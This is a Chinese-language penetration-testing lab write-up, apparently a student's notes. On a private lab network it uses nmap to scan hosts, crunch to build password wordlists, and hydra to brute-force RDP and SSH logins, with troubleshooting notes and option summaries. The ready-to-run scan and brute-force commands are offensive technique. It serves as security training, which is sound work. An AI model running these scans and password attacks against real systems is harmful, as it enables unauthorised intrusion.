目錄
??一、實驗
1.環境
2. Kali Linux (2024.1) 使用 namp 掃描目標主機
3.Kali Linux (2024.1)遠程登錄 Windows Server
4.Kali Linux (2024.1) 使用crunch字典工具
5.Kali Linux (2024.1)使用hydra密碼工具
6.Kali Linux (2022.3)?通過SSH端口獲取 Ubuntu 密碼
二、問題
1.nmap (Network Mapper 網絡探測器) 的命令格式和掃描類型
2.crunch有哪些特殊匹配字符
3.hydra的命令格式和選項參數
4.hydra 密碼工具使用失敗
5. Kali Linux(2022.3) 創建動態網卡
6.hydra 密碼工具使用報錯
??一、實驗
1.環境
(1)主機
表1? 主機
系統 | 版本 | IP | 備注 |
Kali Linux | 2024.1 | 192.168.204.146(動態) 192.168.204.100(靜態) | |
Windows server | 2008 R2 | 192.168.204.150 | Kali(2024.1)的目標主機 |
Kali Linux | 2022.3 | 192.168.204.152(動態) | |
Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.3)的目標主機 |
(2)查看Kali Linux (2024.1)系統版本
cat /etc/os-release
(3)查看Kali Linux (2024.1)系統IP地址
ip addr
(4) 查看Windows server 2008 IP 地址
ipconfig
(5)查看Ubuntu 8.04 系統版本及IP地址
lsb_release -a
ip addr
2. Kali Linux (2024.1) 使用 namp 掃描目標主機
(1) 掃描
nmap 192.168.204.150
(2)掃描?標主機所有開放的端?(TCP半開掃描)
nmap -sS 192.168.204.150
(3)掃描?標主機所有開放的端?(TCP全開掃描)
nmap -sT 192.168.204.150
(4)掃描?標主機系統
nmap -O 192.168.204.150
(5)掃描?標主機所在?段所有存活的主機
nmap -sP 192.168.204.0/24
(6)掃描?標主機所有開放端?對應的服務和軟件版本
nmap -sV 192.168.204.150
(7)掃描?標主機 3389端?的開放情況
nmap -sS -p 3389 192.168.204.150
(8)掃描?標主機 80和3389端?的開放情況
nmap -sS -p 80,3389 192.168.204.150
(9)掃描?標主機 20-80 之間的端?開放情況
nmap -sS -p 20-80 192.168.204.150
3.Kali Linux (2024.1)遠程登錄 Windows Server
(1)遠程連接Windows Server 2008
rdesktop 192.168.204.150
輸入yes
(3) 彈出遠程界面
輸入賬戶密碼
成功:
4.Kali Linux (2024.1) 使用crunch字典工具
(1)查看自帶密碼字典
vim /usr/share/wordlists
(2)使用crunch字典工具
1)隨機組成6位純數字密碼
crunch 6 6 0123456789 -o test1.txt
2)由Abc1234隨機組成的6~8位密碼
crunch 6 8 Abc1234 -o test2.txt
3)以A開頭后?跟3位數字組成的4位密碼
crunch 4 4 -t A%%% -o test3.txt
5.Kali Linux (2024.1)使用hydra密碼工具
(1) 使用hydra密碼工具
hydra -l Administrator -P test4.txt 192.168.204.150 rdp
6.Kali Linux (2022.3)?通過SSH端口獲取 Ubuntu 密碼
(1)查看Kali Linux (2022.3)系統版本
cat /etc/os-release
(2)查看Kali Linux (2022.3)系統IP地址
ip addr | grep 152
(3) nmap 掃描目標主機
掃描?標主機所在?段所有存活的主機,發現新增192.168.204.143
nmap -sP 192.168.204.0/24
(2)掃描?標主機 22端?的開放情況
nmap -sS -p 22 192.168.204.143
(3)使用hydra密碼工具
hydra -l msfadmin -P test5.txt 192.168.204.143 ssh
二、問題
1.nmap (Network Mapper 網絡探測器) 的命令格式和掃描類型
(1)格式
nmap [掃描類型] [選項] <掃描?標>
(2)? 指定掃描類型
1)-sS
TCP半開掃描(只發SYN包,不會產?會話?志),速度快
s: scan 掃描
S:SYN2)-sT
TCP全開掃描(嘗試全連接),結果更準確
T:TCP3) -sU
UDP掃描4) -sP
使?ICMP掃描,僅?于探測?標是否在線5) -O
O:OS操作系統
掃描操作系統6) -sV
掃描端?對應的服務版本
V:VERSION 版本
(3)指定目標端口(p: port 端? )
-p 3389 :掃描指定端?
-p 20-80 :掃描連續的端?
-p 22,80 :掃描多個指定端?
(4)端口狀態(STATE)
1) open開放的2)filtered探測報?被?標服務器的防火墻過濾和阻?了3)closed關閉的
2.crunch有哪些特殊匹配字符
(1)特殊匹配字符
@ --> 代表?寫字?
, --> 代表?寫字?
% --> 代表數字
^ --> 代表標點及特殊字符
3.hydra的命令格式和選項參數
(1)格式
hydra [選項] ?標地址 服務類型
(2)選項參數
1)-l
指定?戶名2)-L
指定?戶名字典?件3)-P
指定密碼字典?件4)-o
將結果輸出到指定?件5)-v
顯示破解過程6)-t
同時執?的任務數,默認16個
4.hydra 密碼工具使用失敗
(1)報錯
(2)原因分析
管理員賬戶拼寫錯誤。
(3) 解決方法
修改為Administrator
成功:
hydra -l Administrator -P test4.txt 192.168.204.150 rdp
5. Kali Linux(2022.3) 創建動態網卡
(1) 修改網絡配置文件
vim /etc/network/interfaces
修改前:
修改后:
auto eth0
iface eh0 inet dhcp
(2)重啟網卡
/etc/init.d/networking restart
(3)查看IP
ip addr | grep 152
6.hydra 密碼工具使用報錯
(1)報錯
(2)原因分析
hydra版本過?。
(3) 解決方法
使用v9.3版本
成功:
hydra -l msfadmin -P test5.txt 192.168.204.143 ssh